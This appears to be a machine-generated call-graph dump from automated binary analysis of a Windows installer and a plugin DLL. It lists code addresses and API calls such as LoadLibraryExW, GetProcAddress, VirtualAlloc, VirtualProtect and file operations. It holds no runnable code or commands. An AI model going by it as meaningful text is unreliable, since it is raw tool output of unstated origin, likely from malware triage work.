calls 5671->5674 5672->5671 5675 401cf8 5673->5675 5676 401cac 5673->5676 5674->5673 5677 402dcb 21 API calls 5675->5677 5678 402da9 21 API calls 5676->5678 5680 401cfd 5677->5680 5679 401cb1 5678->5679 5681 402da9 21 API calls 5679->5681 5682 402dcb 21 API calls 5680->5682 5683 401cbd 5681->5683 5684 401d06 FindWindowExW 5682->5684 5685 401ce8 SendMessageW 5683->5685 5686 401cca SendMessageTimeoutW 5683->5686 5687 401d28 5684->5687 5685->5687 5686->5687 5688 4028e9 5689 4028ef 5688->5689 5690 4028f7 FindClose 5689->5690 5691 402c4f 5689->5691 5690->5691 5692 4016f1 5693 402dcb 21 API calls 5692->5693 5694 4016f7 GetFullPathNameW 5693->5694 5695 401711 5694->5695 5701 401733 5694->5701 5698 4069ff 2 API calls 5695->5698 5695->5701 5696 401748 GetShortPathNameW 5697 402c4f 5696->5697 5699 401723 5698->5699 5699->5701 5702 4066a2 lstrcpynW 5699->5702 5701->5696 5701->5697 5702->5701 5703 401e73 GetDC 5704 402da9 21 API calls 5703->5704 5705 401e85 GetDeviceCaps MulDiv ReleaseDC 5704->5705 5706 402da9 21 API calls 5705->5706 5707 401eb6 5706->5707 5708 4066df 21 API calls 5707->5708 5709 401ef3 CreateFontIndirectW 5708->5709 5710 40265d 5709->5710 5711 402975 5712 402dcb 21 API calls 5711->5712 5713 402981 5712->5713 5714 402997 5713->5714 5715 402dcb 21 API calls 5713->5715 5716 40616d 2 API calls 5714->5716 5715->5714 5717 40299d 5716->5717 5739 406192 GetFileAttributesW CreateFileW 5717->5739 5719 4029aa 5720 402a60 5719->5720 5721 4029c5 GlobalAlloc 5719->5721 5722 402a48 5719->5722 5723 402a67 DeleteFileW 5720->5723 5724 402a7a 5720->5724 5721->5722 5725 4029de 5721->5725 5726 403396 48 API calls 5722->5726 5723->5724 5740 40361d SetFilePointer 5725->5740 5728 402a55 CloseHandle 5726->5728 5728->5720 5729 4029e4 5730 403607 ReadFile 5729->5730 5731 4029ed GlobalAlloc 5730->5731 5732 402a31 5731->5732 5733 4029fd 5731->5733 5734 406244 WriteFile 5732->5734 5735 403396 48 API calls 5733->5735 5736 402a3d GlobalFree 5734->5736 5738 402a0a 5735->5738 5736->5722 5737 402a28 GlobalFree 5737->5732 5738->5737 5739->5719 5740->5729 5741 4014f5 SetForegroundWindow 5742 402c4f 5741->5742 5757 40197b 5758 402dcb 21 API calls 5757->5758 5759 401982 lstrlenW 5758->5759 5760 40265d 5759->5760 5231 4020fd 5232 4021c1 5231->5232 5233 40210f 5231->5233 5236 401423 28 API calls 5232->5236 5234 402dcb 21 API calls 5233->5234 5235 402116 5234->5235 5237 402dcb 21 API calls 5235->5237 5242 40231b 5236->5242 5238 40211f 5237->5238 5239 402135 LoadLibraryExW 5238->5239 5240 402127 GetModuleHandleW 5238->5240 5239->5232 5241 402146 5239->5241 5240->5239 5240->5241 5254 406b05 5241->5254 5245 402190 5247 405727 28 API calls 5245->5247 5246 402157 5248 402176 5246->5248 5249 40215f 5246->5249 5250 402167 5247->5250 5259 6e9f1817 5248->5259 5251 401423 28 API calls 5249->5251 5250->5242 5252 4021b3 FreeLibrary 5250->5252 5251->5250 5252->5242 5301 4066c4 WideCharToMultiByte 5254->5301 5256 406b22 5257 406b29 GetProcAddress 5256->5257 5258 402151 5256->5258 5257->5258 5258->5245 5258->5246 5260 6e9f184a 5259->5260 5302 6e9f1bff 5260->5302 5262 6e9f1851 5263 6e9f1976 5262->5263 5264 6e9f1869 5262->5264 5265 6e9f1862 5262->5265 5263->5250 5336 6e9f2480 5264->5336 5352 6e9f243e 5265->5352 5270 6e9f18af 5365 6e9f2655 5270->5365 5271 6e9f18cd 5276 6e9f191e 5271->5276 5277 6e9f18d3 5271->5277 5272 6e9f187f 5275 6e9f1885 5272->5275 5279 6e9f1890 5272->5279 5273 6e9f1898 5285 6e9f188e 5273->5285 5362 6e9f2e23 5273->5362 5275->5285 5346 6e9f2b98 5275->5346 5283 6e9f2655 10 API calls 5276->5283 5384 6e9f1666 5277->5384 5278 6e9f18b5 5376 6e9f1654 5278->5376 5356 6e9f2810 5279->5356 5288 6e9f190f 5283->5288 5285->5270 5285->5271 5292 6e9f1965 5288->5292 5390 6e9f2618 5288->5390 5290 6e9f1896 5290->5285 5291 6e9f2655 10 API calls 5291->5288 5292->5263 5296 6e9f196f GlobalFree 5292->5296 5296->5263 5298 6e9f1951 5298->5292 5394 6e9f15dd wsprintfW 5298->5394 5299 6e9f194a FreeLibrary 5299->5298 5301->5256 5397 6e9f12bb GlobalAlloc 5302->5397 5304 6e9f1c26 5398 6e9f12bb GlobalAlloc 5304->5398 5306 6e9f1e6b GlobalFree GlobalFree GlobalFree 5307 6e9f1e88 5306->5307 5326 6e9f1ed2 5306->5326 5309 6e9f227e 5307->5309 5315 6e9f1e9d 5307->5315 5307->5326 5308 6e9f1d26 GlobalAlloc 5329 6e9f1c31 5308->5329 5310 6e9f22a0 GetModuleHandleW 5309->5310 5309->5326 5313 6e9f22c6 5310->5313 5314 6e9f22b1 LoadLibraryW 5310->5314 5311 6e9f1d71 lstrcpyW 5317 6e9f1d7b lstrcpyW 5311->5317 5312 6e9f1d8f GlobalFree 5312->5329 5405 6e9f16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5313->5405 5314->5313 5314->5326 5315->5326 5401 6e9f12cc 5315->5401 5317->5329 5318 6e9f2318 5320 6e9f2325 lstrlenW 5318->5320 5318->5326 5319 6e9f2126 5404 6e9f12bb GlobalAlloc 5319->5404 5406 6e9f16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5320->5406 5324 6e9f2067 GlobalFree 5324->5329 5325 6e9f21ae 5325->5326 5333 6e9f2216 lstrcpyW 5325->5333 5326->5262 5327 6e9f22d8 5327->5318 5335 6e9f2302 GetProcAddress 5327->5335 5328 6e9f233f 5328->5326 5329->5306 5329->5308 5329->5311 5329->5312 5329->5317 5329->5319 5329->5324 5329->5325 5329->5326 5330 6e9f12cc 2 API calls 5329->5330 5331 6e9f1dcd 5329->5331 5330->5329 5331->5329 5399 6e9f162f GlobalSize GlobalAlloc 5331->5399 5333->5326 5334 6e9f212f 5334->5262 5335->5318 5343 6e9f2498 5336->5343 5338 6e9f25c1 GlobalFree 5339 6e9f186f 5338->5339 5338->5343 5339->5272 5339->5273 5339->5285 5340 6e9f256b GlobalAlloc CLSIDFromString 5340->5338 5341 6e9f2540 GlobalAlloc WideCharToMultiByte 5341->5338 5342 6e9f12cc GlobalAlloc lstrcpynW 5342->5343 5343->5338 5343->5340 5343->5341 5343->5342 5345 6e9f258a 5343->5345 5408 6e9f135a 5343->5408 5345->5338 5412 6e9f27a4 5345->5412 5348 6e9f2baa 5346->5348 5347 6e9f2c4f SetFilePointer 5351 6e9f2c6d 5347->5351 5348->5347 5350 6e9f2d39 5350->5285 5415 6e9f2b42 5351->5415 5353 6e9f2453 5352->5353 5354 6e9f245e GlobalAlloc 5353->5354 5355 6e9f1868 5353->5355 5354->5353 5355->5264 5360 6e9f2840 5356->5360 5357 6e9f28ee 5359 6e9f28f4 GlobalSize 5357->5359 5361 6e9f28fe 5357->5361 5358 6e9f28db GlobalAlloc 5358->5361 5359->5361 5360->5357 5360->5358 5361->5290 5363 6e9f2e2e 5362->5363 5364 6e9f2e6e GlobalFree 5363->5364 5419 6e9f12bb GlobalAlloc 5365->5419 5367 6e9f270b lstrcpynW 5372 6e9f265f 5367->5372 5368 6e9f26fa StringFromGUID2 5368->5372 5369 6e9f26d8 MultiByteToWideChar 5369->5372 5370 6e9f2742 GlobalFree 5370->5372 5371 6e9f271e wsprintfW 5371->5372 5372->5367 5372->5368 5372->5369 5372->5370 5372->5371 5373 6e9f2777 GlobalFree 5372->5373 5374 6e9f1312 2 API calls 5372->5374 5420 6e9f1381 5372->5420 5373->5278 5374->5372 5424 6e9f12bb GlobalAlloc 5376->5424 5378 6e9f1659 5379 6e9f1666 2 API calls 5378->5379 5380 6e9f1663 5379->5380 5381 6e9f1312 5380->5381 5382 6e9f131b GlobalAlloc lstrcpynW 5381->5382 5383 6e9f1355 GlobalFree 5381->5383 5382->5383 5383->5288 5385 6e9f169f lstrcpyW 5384->5385 5386 6e9f1672 wsprintfW 5384->5386 5389 6e9f16b8 5385->5389 5386->5389 5389->5291 5391 6e9f2626 5390->5391 5393 6e9f1931 5390->5393 5392 6e9f2642 GlobalFree 5391->5392 5391->5393 5392->5391 5393->5298 5393->5299 5395 6e9f1312 2 API calls 5394->5395 5396 6e9f15fe 5395->5396 5396->5292 5397->5304 5398->5329 5400 6e9f164d 5399->5400 5400->5331 5407 6e9f12bb GlobalAlloc 5401->5407 5403 6e9f12db lstrcpynW 5403->5326 5404->5334 5405->5327 5406->5328 5407->5403 5409 6e9f1361 5408->5409 5410 6e9f12cc 2 API calls 5409->5410 5411 6e9f137f 5410->5411 5411->5343 5413 6e9f2808 5412->5413 5414 6e9f27b2 VirtualAlloc 5412->5414 5413->5345 5414->5413 5416 6e9f2b4d 5415->5416 5417 6e9f2b5d 5416->5417 5418 6e9f2b52 GetLastError 5416->5418 5417->5350 5418->5417 5419->5372 5421 6e9f13ac 5420->5421 5422 6e9f138a 5420->5422 5421->5372 5422->5421 5423 6e9f1390 lstrcpyW 5422->5423 5423->5421 5424->5378 5768 402b7e 5769 402bd0 5768->5769 5770 402b85 5768->5770 5771 406a96 5 API calls 5769->5771 5773 402bce 5770->5773 5774 402da9 21 API calls 5770->5774 5772 402bd7 5771->5772 5775 402dcb 21 API calls 5772->5775 5776 402b93 5774->5776 5777 402be0 5775->5777 5778 402da9 21 API calls 5776->5778 5777->5773 5779 402be4 IIDFromString 5777->5779 5781 402b9f 5778->5781 5779->5773 5780 402bf3 5779->5780 5780->5773 5786 4066a2 lstrcpynW 5780->5786 5785 4065e9 wsprintfW 5781->5785 5784 402c10 CoTaskMemFree 5784->5773 5785->5773 5786->5784 5787 401000 5788 401037 BeginPaint GetClientRect 5787->5788 5789 40100c DefWindowProcW 5787->5789 5791 4010f3 5788->5791 5792 401179 5789->5792 5793 401073 CreateBrushIndirect FillRect DeleteObject 5791->5793 5794 4010fc 5791->5794 5793->5791 5795 401102 CreateFontIndirectW 5794->5795 5796 401167 EndPaint 5794->5796 5795->5796 5797 401112 6 API calls 5795->5797 5796->5792 5797->5796 5798 402a80 5799 402da9 21 API calls 5798->5799 5800 402a86 5799->5800 5801 402ac9 5800->5801 5802 402aad 5800->5802 5811 402953 5800->5811 5804 402ae3 5801->5804 5805 402ad3 5801->5805 5803 402ab2 5802->5803 5808 402ac3 5802->5808 5812 4066a2 lstrcpynW 5803->5812 5807 4066df 21 API calls 5804->5807 5806 402da9 21 API calls 5805->5806 5806->5811 5807->5811 5813 4065e9 wsprintfW 5808->5813 5812->5811 5813->5811 4324 401781 4330 402dcb 4324->4330 4328 40178f 4329 4061c1 2 API calls 4328->4329 4329->4328 4331 402dd7 4330->4331 4332 4066df 21 API calls 4331->4332 4333 402df8 4332->4333 4334 401788 4333->4334 4335 406950 5 API calls 4333->4335 4336 4061c1 4334->4336 4335->4334 4337 4061ce GetTickCount GetTempFileNameW 4336->4337 4338 406208 4337->4338 4339 406204 4337->4339 4338->4328 4339->4337 4339->4338 5814 401d82 5815 402da9 21 API calls 5814->5815 5816 401d93 SetWindowLongW 5815->5816 5817 402c4f 5816->5817 4450 401f03 4458 402da9 4450->4458 4452 401f09 4453 402da9 21 API calls 4452->4453 4454 401f15 4453->4454 4455 401f21 ShowWindow 4454->4455 4456 401f2c EnableWindow 4454->4456 4457 402c4f 4455->4457 4456->4457 4459 4066df 21 API calls 4458->4459 4460 402dbe 4459->4460 4460->4452 5818 401503 5819 401508 5818->5819 5821 40152e 5818->5821 5820 402da9 21 API calls 5819->5820 5820->5821 5822 402903 5823 40290b 5822->5823 5824 40290f FindNextFileW 5823->5824 5826 402921 5823->5826 5825 402968 5824->5825 5824->5826 5828 4066a2 lstrcpynW 5825->5828 5828->5826 5829 6e9f1058 5830 6e9f1074 5829->5830 5831 6e9f10dd 5830->5831 5832 6e9f15b6 GlobalFree 5830->5832 5834 6e9f1092 5830->5834 5832->5834 5833 6e9f15b6 GlobalFree 5835 6e9f10a2 5833->5835 5834->5833 5836 6e9f10a9 GlobalSize 5835->5836 5837 6e9f10b2 5835->5837 5836->5837 5838 6e9f10c7 5837->5838 5839 6e9f10b6 GlobalAlloc 5837->5839 5841 6e9f10d2 GlobalFree 5838->5841 5840 6e9f15dd 3 API calls 5839->5840 5840->5838 5841->5831 5842 401588 5843 402bc9 5842->5843 5846 4065e9 wsprintfW 5843->5846 5845 402bce 5846->5845 5854 40198d 5855 402da9 21 API calls 5854->5855 5856 401994 5855->5856 5857 402da9 21 API calls 5856->5857 5858 4019a1 5857->5858 5859 402dcb 21 API calls 5858->5859 5860 4019b8 lstrlenW 5859->5860 5862 4019c9 5860->5862 5861 401a0a 5862->5861 5866 4066a2 lstrcpynW 5862->5866 5864 4019fa 5864->5861 5865 4019ff lstrlenW 5864->5865 5865->5861 5866->5864 4969 40508e GetDlgItem GetDlgItem 4970 4050e0 7 API calls 4969->4970 4986 405305 4969->4986 4971 405187 DeleteObject 4970->4971 4972 40517a SendMessageW 4970->4972 4973 405190 4971->4973 4972->4971 4974 4051c7 4973->4974 4976 40519f 4973->4976 4977 404621 22 API calls 4974->4977 4975 4053e7 4978 405493 4975->4978 4982 405686 4975->4982 4991 405440 SendMessageW 4975->4991 4980 4066df 21 API calls 4976->4980 4981 4051db 4977->4981 4983 4054a5 4978->4983 4984 40549d SendMessageW 4978->4984 4979 4053c8 4979->4975 4992 4053d9 SendMessageW 4979->4992 4987 4051a9 SendMessageW SendMessageW 4980->4987 4990 404621 22 API calls 4981->4990 4993 404688 8 API calls 4982->4993 4988 4054ce 4983->4988 4995 4054b7 ImageList_Destroy 4983->4995 4996 4054be 4983->4996 4984->4983 4985 405363 5028 404fdc SendMessageW 4985->5028 4986->4975 4986->4979 4986->4985 4987->4973 4998 405648 4988->4998 5020 405509 4988->5020 5033 40505c 4988->5033 4997 4051ec 4990->4997 4991->4982 4999 405455 SendMessageW 4991->4999 4992->4975 4994 405694 4993->4994 4995->4996 4996->4988 5000 4054c7 GlobalFree 4996->5000 5001 4052c7 GetWindowLongW SetWindowLongW 4997->5001 5009 40523f SendMessageW 4997->5009 5011 4052c2 4997->5011 5014 405291 SendMessageW 4997->5014 5015 40527d SendMessageW 4997->5015 4998->4982 5003 40565a ShowWindow GetDlgItem ShowWindow 4998->5003 5006 405468 4999->5006 5000->4988 5002 4052e0 5001->5002 5004 4052e5 ShowWindow 5002->5004 5005 4052fd 5002->5005 5003->4982 5026 404656 SendMessageW 5004->5026 5027 404656 SendMessageW 5005->5027 5010 405479 SendMessageW 5006->5010 5009->4997 5010->4978 5011->5001 5011->5002 5012 4052f8 5012->4982 5013 405374 5013->4979 5014->4997 5015->4997 5017 405613 5018 40561e InvalidateRect 5017->5018 5023 40562a 5017->5023 5018->5023 5019 405537 SendMessageW 5021 40554d 5019->5021 5020->5019 5020->5021 5021->5017 5022 4055ae 5021->5022 5024 4055c1 SendMessageW SendMessageW 5021->5024 5022->5024 5023->4998 5042 404f97 5023->5042 5024->5021 5026->5012 5027->4986 5029 40503b SendMessageW 5028->5029 5030 404fff GetMessagePos ScreenToClient SendMessageW 5028->5030 5031 405033 5029->5031 5030->5031 5032 405038 5030->5032 5031->5013 5032->5029 5045 4066a2 lstrcpynW 5033->5045 5035 40506f 5046 4065e9 wsprintfW 5035->5046 5037 405079 5038 40140b 2 API calls 5037->5038 5039 405082 5038->5039 5047 4066a2 lstrcpynW 5039->5047 5041 405089 5041->5020 5048 404ece 5042->5048 5044 404fac 5044->4998 5045->5035 5046->5037 5047->5041 5049 404ee7 5048->5049 5050 4066df 21 API calls 5049->5050 5051 404f4b 5050->5051 5052 4066df 21 API calls 5051->5052 5053 404f56 5052->5053 5054 4066df 21 API calls 5053->5054 5055 404f6c lstrlenW wsprintfW SetDlgItemTextW 5054->5055 5055->5044 5867 40168f 5868 402dcb 21 API calls 5867->5868 5869 401695 5868->5869 5870 4069ff 2 API calls 5869->5870 5871 40169b 5870->5871 5872 402b10 5873 402da9 21 API calls 5872->5873 5874 402b16 5873->5874 5875 4066df 21 API calls 5874->5875 5876 402953 5874->5876 5875->5876 5103 402711 5104 402da9 21 API calls 5103->5104 5114 402720 5104->5114 5105 40285d 5106 40276a ReadFile 5106->5105 5106->5114 5107 406215 ReadFile 5107->5114 5108 402803 5108->5105 5108->5114 5117 406273 SetFilePointer 5108->5117 5110 4027aa MultiByteToWideChar 5110->5114 5111 40285f 5126 4065e9 wsprintfW 5111->5126 5113 4027d0 SetFilePointer MultiByteToWideChar 5113->5114 5114->5105 5114->5106 5114->5107 5114->5108 5114->5110 5114->5111 5114->5113 5116 402870 5114->5116 5115 402891 SetFilePointer 5115->5105 5116->5105 5116->5115 5118 40628f 5117->5118 5121 4062a7 5117->5121 5119 406215 ReadFile 5118->5119 5120 40629b 5119->5120 5120->5121 5122 4062b0 SetFilePointer 5120->5122 5123 4062d8 SetFilePointer 5120->5123 5121->5108 5122->5123 5124 4062bb 5122->5124 5123->5121 5125 406244 WriteFile 5124->5125 5125->5121 5126->5105 5877 401491 5878 405727 28 API calls 5877->5878 5879 401498 5878->5879 5880 404791 lstrlenW 5881 4047b0 5880->5881 5882 4047b2 WideCharToMultiByte 5880->5882 5881->5882 5883 404b12 5884 404b3e 5883->5884 5885 404b4f 5883->5885 5944 405ce6 GetDlgItemTextW 5884->5944 5887 404b5b GetDlgItem 5885->5887 5892 404bba 5885->5892 5890 404b6f 5887->5890 5888 404c9e 5942 404e4d 5888->5942 5946 405ce6 GetDlgItemTextW 5888->5946 5889 404b49 5891 406950 5 API calls 5889->5891 5894 404b83 SetWindowTextW 5890->5894 5895 40601c 4 API calls 5890->5895 5891->5885 5892->5888 5896 4066df 21 API calls 5892->5896 5892->5942 5898 404621 22 API calls 5894->5898 5900 404b79 5895->5900 5901 404c2e SHBrowseForFolderW 5896->5901 5897 404cce 5902 406079 18 API calls 5897->5902 5903 404b9f 5898->5903 5899 404688 8 API calls 5904 404e61 5899->5904 5900->5894 5908 405f71 3 API calls 5900->5908 5901->5888 5905 404c46 CoTaskMemFree 5901->5905 5906 404cd4 5902->5906 5907 404621 22 API calls 5903->5907 5909 405f71 3 API calls 5905->5909 5947 4066a2 lstrcpynW 5906->5947 5910 404bad 5907->5910 5908->5894 5911 404c53 5909->5911 5945 404656 SendMessageW 5910->5945 5914 404c8a SetDlgItemTextW 5911->5914 5919 4066df 21 API calls 5911->5919 5914->5888 5915 404bb3 5917 406a96 5 API calls 5915->5917 5916 404ceb 5918 406a96 5 API calls 5916->5918 5917->5892 5927 404cf2 5918->5927 5920 404c72 lstrcmpiW 5919->5920 5920->5914 5923 404c83 lstrcatW 5920->5923 5921 404d33 5948 4066a2 lstrcpynW 5921->5948 5923->5914 5924 404d3a 5925 40601c 4 API calls 5924->5925 5926 404d40 GetDiskFreeSpaceW 5925->5926 5930 404d64 MulDiv 5926->5930 5931 404d8b 5926->5931 5927->5921 5929 405fbd 2 API calls 5927->5929 5927->5931 5929->5927 5930->5931 5932 404dfc 5931->5932 5934 404f97 24 API calls 5931->5934 5933 404e1f 5932->5933 5935 40140b 2 API calls 5932->5935 5949 404643 EnableWindow 5933->5949 5936 404de9 5934->5936 5935->5933 5938 404dfe SetDlgItemTextW 5936->5938 5939 404dee 5936->5939 5938->5932 5941 404ece 24 API calls 5939->5941 5940 404e3b 5940->5942 5943 404a6b SendMessageW 5940->5943 5941->5932 5942->5899 5943->5942 5944->5889 5945->5915 5946->5897 5947->5916 5948->5924 5949->5940 5127 401794 5128 402dcb 21 API calls 5127->5128 5129 40179b 5128->5129 5130 4017c3 5129->5130 5131 4017bb 5129->5131 5168 4066a2 lstrcpynW 5130->5168 5167 4066a2 lstrcpynW 5131->5167 5134 4017c1 5138 406950 5 API calls 5134->5138 5135 4017ce 5136 405f71 3 API calls 5135->5136 5137 4017d4 lstrcatW 5136->5137 5137->5134 5141 4017e0 5138->5141 5139 4069ff 2 API calls 5139->5141 5140 40181c 5142 40616d 2 API calls 5140->5142 5141->5139 5141->5140 5144 4017f2 CompareFileTime 5141->5144 5145 4018b2 5141->5145 5149 4066a2 lstrcpynW 5141->5149 5153 4066df 21 API calls 5141->5153 5160 405d02 MessageBoxIndirectW 5141->5160 5165 401889 5141->5165 5166 406192 GetFileAttributesW CreateFileW 5141->5166 5142->5141 5144->5141 5146 405727 28 API calls 5145->5146 5147 4018bc 5146->5147 5150 403396 48 API calls 5147->5150 5148 405727 28 API calls 5163 40189e 5148->5163 5149->5141 5151 4018cf 5150->5151 5152 4018e3 SetFileTime 5151->5152 5154 4018f5 CloseHandle 5151->5154 5152->5154 5153->5141 5155 401906 5154->5155 5154->5163 5156 40190b 5155->5156 5157 40191e 5155->5157 5158 4066df 21 API calls 5156->5158 5159 4066df 21 API calls 5157->5159 5161 401913 lstrcatW 5158->5161 5162 401926 5159->5162 5160->5141 5161->5162 5162->5163 5164 405d02 MessageBoxIndirectW 5162->5164 5164->5163 5165->5148 5165->5163 5166->5141 5167->5134 5168->5135 5950 401a97 5951 402da9 21 API calls 5950->5951 5952 401aa0 5951->5952 5953 402da9 21 API calls 5952->5953 5954 401a45 5953->5954 5955 401598 5956 4015b1 5955->5956 5957 4015a8 ShowWindow 5955->5957 5958 402c4f 5956->5958 5959 4015bf ShowWindow 5956->5959 5957->5956 5959->5958 5960 402419 5961 402dcb 21 API calls 5960->5961 5962 402428 5961->5962 5963 402dcb 21 API calls 5962->5963 5964 402431 5963->5964 5965 402dcb 21 API calls 5964->5965 5966 40243b GetPrivateProfileStringW 5965->5966 5217 40569b 5218 4056ab 5217->5218 5219 4056bf 5217->5219 5221 4056b1 5218->5221 5230 405708 5218->5230 5220 4056c7 IsWindowVisible 5219->5220 5226 4056e7 5219->5226 5222 4056d4 5220->5222 5220->5230 5224 40466d SendMessageW 5221->5224 5225 404fdc 5 API calls 5222->5225 5223 40570d CallWindowProcW 5227 4056bb 5223->5227 5224->5227 5228 4056de 5225->5228 5226->5223 5229 40505c 4 API calls 5226->5229 5228->5226 5229->5230 5230->5223 5967 40201b 5968 402dcb 21 API calls 5967->5968 5969 402022 5968->5969 5970 4069ff 2 API calls 5969->5970 5971 402028 5970->5971 5973 402039 5971->5973 5974 4065e9 wsprintfW 5971->5974 5974->5973 5975 6e9f2d43 5976 6e9f2d5b 5975->5976 5977 6e9f162f 2 API calls 5976->5977 5978 6e9f2d76 5977->5978 5979 401b9c 5980 402dcb 21 API calls 5979->5980 5981 401ba3 5980->5981 5982 402da9 21 API calls 5981->5982 5983 401bac wsprintfW 5982->5983 5984 402c4f 5983->5984 5985 40149e 5986 4023c2 5985->5986 5987 4014ac PostQuitMessage 5985->5987 5987->5986 4321 6e9f2a7f 4322 6e9f2acf 4321->4322 4323 6e9f2a8f VirtualProtect 4321->4323 4323->4322 5988 4016a0 5989 402dcb 21 API calls 5988->5989 5990 4016a7 5989->5990 5991 402dcb 21 API calls 5990->5991 5992 4016b0 5991->5992 5993 402dcb 21 API calls 5992->5993 5994 4016b9 MoveFileW 5993->5994 5995 4016cc 5994->5995 6001 4016c5 5994->6001 5996 4069ff 2 API calls 5995->5996 5997 40231b 5995->5997 5999 4016db 5996->5999 5998 401423 28 API calls 5998->5997 5999->5997 6000 406462 40 API calls 5999->6000 6000->6001 6001->5998 4340 404122 4341 40413a 4340->4341 4342 40429b 4340->4342 4341->4342 4343 404146 4341->4343 4344 4042ec 4342->4344 4345 4042ac GetDlgItem GetDlgItem 4342->4345 4348 404151 SetWindowPos 4343->4348 4349 404164 4343->4349 4347 404346 4344->4347 4357 401389 2 API calls 4344->4357 4346 404621 22 API calls 4345->4346 4350 4042d6 SetClassLongW 4346->4350 4358 404296 4347->4358 4414 40466d 4347->4414 4348->4349 4352 40416d ShowWindow 4349->4352 4353 4041af 4349->4353 4354 40140b 2 API calls 4350->4354 4359 404288 4352->4359 4360 40418d GetWindowLongW 4352->4360 4355 4041b7 DestroyWindow 4353->4355 4356 4041ce 4353->4356 4354->4344 4362 4045cb 4355->4362 4363 4041d3 SetWindowLongW 4356->4363 4364 4041e4 4356->4364 4365 40431e 4357->4365 4436 404688 4359->4436 4360->4359 4361 4041a6 ShowWindow 4360->4361 4361->4353 4362->4358 4371 4045db ShowWindow 4362->4371 4363->4358 4364->4359 4368 4041f0 GetDlgItem 4364->4368 4365->4347 4369 404322 SendMessageW 4365->4369 4367 4045ac DestroyWindow EndDialog 4367->4362 4372 404201 SendMessageW IsWindowEnabled 4368->4372 4373 40421e 4368->4373 4369->4358 4370 40140b 2 API calls 4381 404358 4370->4381 4371->4358 4372->4358 4372->4373 4375 40422b 4373->4375 4378 404272 SendMessageW 4373->4378 4379 40423e 4373->4379 4386 404223 4373->4386 4374 4066df 21 API calls 4374->4381 4375->4378 4375->4386 4377 404621 22 API calls 4377->4381 4378->4359 4382 404246 4379->4382 4383 40425b 4379->4383 4380 404259 4380->4359 4381->4358 4381->4367 4381->4370 4381->4374 4381->4377 4404 4044ec DestroyWindow 4381->4404 4417 404621 4381->4417 4430 40140b 4382->4430 4385 40140b 2 API calls 4383->4385 4387 404262 4385->4387 4433 4045fa 4386->4433 4387->4359 4387->4386 4389 4043d3 GetDlgItem 4390 4043f0 ShowWindow KiUserCallbackDispatcher 4389->4390 4391 4043e8 4389->4391 4420 404643 EnableWindow 4390->4420 4391->4390 4393 40441a EnableWindow 4398 40442e 4393->4398 4394 404433 GetSystemMenu EnableMenuItem SendMessageW 4395 404463 SendMessageW 4394->4395 4394->4398 4395->4398 4398->4394 4421 404656 SendMessageW 4398->4421 4422 404103 4398->4422 4425 4066a2 lstrcpynW 4398->4425 4400 404492 lstrlenW 4401 4066df 21 API calls 4400->4401 4402 4044a8 SetWindowTextW 4401->4402 4426 401389 4402->4426 4404->4362 4405 404506 CreateDialogParamW 4404->4405 4405->4362 4406 404539 4405->4406 4407 404621 22 API calls 4406->4407 4408 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4407->4408 4409 401389 2 API calls 4408->4409 4410 40458a 4409->4410 4410->4358 4411 404592 ShowWindow 4410->4411 4412 40466d SendMessageW 4411->4412 4413 4045aa 4412->4413 4413->4362 4415 404685 4414->4415 4416 404676 SendMessageW 4414->4416 4415->4381 4416->4415 4418 4066df 21 API calls 4417->4418 4419 40462c SetDlgItemTextW 4418->4419 4419->4389 4420->4393 4421->4398 4423 4066df 21 API calls 4422->4423 4424 404111 SetWindowTextW 4423->4424 4424->4398 4425->4400 4428 401390 4426->4428 4427 4013fe 4427->4381 4428->4427 4429 4013cb MulDiv SendMessageW 4428->4429 4429->4428 4431 401389 2 API calls 4430->4431 4432 401420 4431->4432 4432->4386 4434 404601 4433->4434 4435 404607 SendMessageW 4433->4435 4434->4435 4435->4380 4437 40474b 4436->4437 4438 4046a0 GetWindowLongW 4436->4438 4437->4358 4438->4437 4439 4046b5 4438->4439 4439->4437 4440 4046e2 GetSysColor 4439->4440 4441 4046e5 4439->4441 4440->4441 4442 4046f5 SetBkMode 4441->4442 4443 4046eb SetTextColor 4441->4443 4444 404713 4442->4444 4445 40470d GetSysColor 4442->4445 4443->4442 4446 40471a SetBkColor 4444->4446 4447 404724 4444->4447 4445->4444 4446->4447 4447->4437 4448 404737 DeleteObject 4447->4448 4449 40473e CreateBrushIndirect 4447->4449 4448->4449 4449->4437 6002 402324 6003 402dcb 21 API calls 6002->6003 6004 40232a 6003->6004 6005 402dcb 21 API calls 6004->6005 6006 402333 6005->6006 6007 402dcb 21 API calls 6006->6007 6008 40233c 6007->6008 6009 4069ff 2 API calls 6008->6009 6010 402345 6009->6010 6011 402356 lstrlenW lstrlenW 6010->6011 6012 402349 6010->6012 6013 405727 28 API calls 6011->6013 6014 405727 28 API calls 6012->6014 6016 402351 6012->6016 6015 402394 SHFileOperationW 6013->6015 6014->6016 6015->6012 6015->6016 6024 6e9f1979 6025 6e9f199c 6024->6025 6026 6e9f19d1 GlobalFree 6025->6026 6027 6e9f19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6025->6027 6026->6027 6028 6e9f1312 2 API calls 6027->6028 6029 6e9f1b6e GlobalFree GlobalFree 6028->6029 6030 401da6 6031 401db9 GetDlgItem 6030->6031 6032 401dac 6030->6032 6034 401db3 6031->6034 6033 402da9 21 API calls 6032->6033 6033->6034 6035 401dfa GetClientRect LoadImageW SendMessageW 6034->6035 6037 402dcb 21 API calls 6034->6037 6038 401e58 6035->6038 6040 401e64 6035->6040 6037->6035 6039 401e5d DeleteObject 6038->6039 6038->6040 6039->6040 6041 4023a8 6042 4023af 6041->6042 6045 4023c2 6041->6045 6043 4066df 21 API calls 6042->6043 6044 4023bc 6043->6044 6044->6045 6046 405d02 MessageBoxIndirectW 6044->6046 6046->6045 6047 402c2a SendMessageW 6048 402c44 InvalidateRect 6047->6048 6049 402c4f 6047->6049 6048->6049 6050 6e9f1774 6051 6e9f17a3 6050->6051 6052 6e9f1bff 22 API calls 6051->6052 6053 6e9f17aa 6052->6053 6054 6e9f17bd 6053->6054 6055 6e9f17b1 6053->6055 6057 6e9f17c7 6054->6057 6058 6e9f17e4 6054->6058 6056 6e9f1312 2 API calls 6055->6056 6061 6e9f17bb 6056->6061 6062 6e9f15dd 3 API calls 6057->6062 6059 6e9f180e 6058->6059 6060 6e9f17ea 6058->6060 6064 6e9f15dd 3 API calls 6059->6064 6063 6e9f1654 3 API calls 6060->6063 6065 6e9f17cc 6062->6065 6066 6e9f17ef 6063->6066 